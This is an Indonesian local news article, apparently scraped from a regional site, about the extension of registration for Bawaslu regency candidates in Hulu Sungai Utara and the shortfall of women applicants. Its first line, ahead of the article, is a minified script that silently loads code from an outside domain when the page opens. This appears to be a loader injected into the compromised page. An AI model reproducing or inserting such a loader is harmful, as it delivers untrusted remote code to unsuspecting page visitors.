(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Calon Anggota Bawaslu Kabupaten HSU Minim Pendaftar, Pansel Perpanjang Masa Pendaftaran


KANALKALIMANTAN.COM, AMUNTAI – Panitia Seleksi (Pansel) calon anggota Bawaslu Kabupaten/Kota Provinsi Kalimantan Selatan (Kalsel) masa jabatan 2023-2028 memberikan perpanjangan masa pendaftaran hingga 21 Juni 2023 mendatang.

Hal itu disampaikan Ketua Tim Seleksi (Timsel) Zona 3 Abrani Sulaiman, saat melakukan sosialisasi pendaftaran calon penyelenggara Pemilihan Umum (Pemilu) di Kabupaten Hulu Sungai Utara (HSU), Sabtu (17/6/2023) sore.

Menurut Abrani, perpanjangan masa pendaftaran ini dilakukan lantaran berdasarkan jumlah pendaftar hingga masa pendaftaran berakhir masih belum terpenuhinya syarat dan ketentuan jumlah 8 kali kebutuhan dan keterwakilan 30 persen perempuan, maka dilakukanlah perpanjangan masa pendaftaran seleksi calon anggota Bawaslu Kabupaten/Kota Provinsi Kalsel.

“Untuk wilayah Hulu Sungai Utara perpanjangan masa pendaftaran ini diperuntukkan bagi pendaftar laki-laki dan perempuan, karena masih kekurangan kuota jadi minimal pendaftar di satu kabupaten itu 24 orang, dan dalam 24 peserta itu minimal 8 orang peserta perempuan, saat ini (HSU) baru total 20 pendaftar,” katanya.

Baca juga :Kapten Mustafa Ideham Pemimpin Perang Batakan, Pendiri Uniska Banjarmasin yang Memilih Mundur dari Tentara

Diketahui, Kabupaten HSU sendiri berada di zona 3 penerimaan calon anggota Bawaslu kabupaten kota di Provinsi Kalsel meliputi Kabupaten Balangan, Hulu Sungai Tengah (HST) dan Kabupaten Tabalong.

Lebih lanjut, Abrani berharap dengan diberikannya masa perpanjangan pendaftaran ini kouta seleksi calon anggota Bawaslu kabupaten kota dapat terpenuhi termasuk dapat melengkapi berkas pendaftaran.

“Bagi peminat calon anggota Bawaslu dari Kabupaten HSU, sekiranya bisa segera melengkapi hal-hal yang kurang lengkap,” imbuhnya.

Dirinya juga meyakinkan untuk membuka seluas-luasnya pendaftaran bagi peminat baik dari kalangan organisasi masyarakat (Ormas) maupun dari kalangan ASN (Aparatur Sipil Negara).

Baca juga: Hari Dermaga Nasional: Sejarah, Fungsi, Perbedaan Antara Dermaga dan Pelabuhan

Selain itu, Abrani mengapresiasi Bawaslu HSU yang memfasilitasi seleksi calon anggota yang mendaftarkan diri tanpa perlu mengatakan berkas pendaftaran ke sekretariat Pansel di Banjarmasin.

Seiring dengan itu, Sekertaris Timsel Zona 3, Erlinaberharap waktu perpanjangan pendaftaran yang diberikan ini dapat memberikan kesempatan bagi calon pendaftar, tidak hanya laki-laki namun juga bagi perempuan.

Karena menurutnya, untuk zona 3 wilayah lainnya meliputi Kabupaten Balangan, HST dan Kabupaten Tabalong jumlah kuota pendaftar perempuan masih belum terpenuhi.

“Saat ini untuk pendaftar perempuan baru 2 orang dari Kabupaten HSU, sedangkan 18 orang lainnya laki-laki, jadi secara kuantitas masih kurang, baik untuk pendaftar perempuan maupun pendaftar laki-laki,” katanya.

Tetapi untuk Kabupaten HST, Tabalong dan Kabupaten Balangan, kata Erlina hanya menerima pendaftar perempuan, karena untuk pendaftar laki-laki telah memenuhi target pendaftaran.

Baca juga: Sempat Goreng Telur untuk Anak, Perempuan Tenggelam Meninggal di Martapura Terperosok di Titian Kayu

“Mudah-mudahan di tiga hari terakhir akan  banyak lagi pendaftar untuk calon Bawaslu Kabupaten Hulu Sungai Utara,” imbuhnya.

Adapun untuk masa perpanjangan pendaftaran sendiri,  Panitia Seleksi memberikan masa tenggang sampai dengan 21 Juni 2023 dan untuk pengumuman hasil pendaftaran verifikasi akan diumumkan pada 24 Juni 2024.(Kanalkalimantan.com/dew)

Reporter: dew
Editor: bie


Al Ghifari

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

8 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

9 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

9 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

9 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

9 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

9 jam ago

This website uses cookies.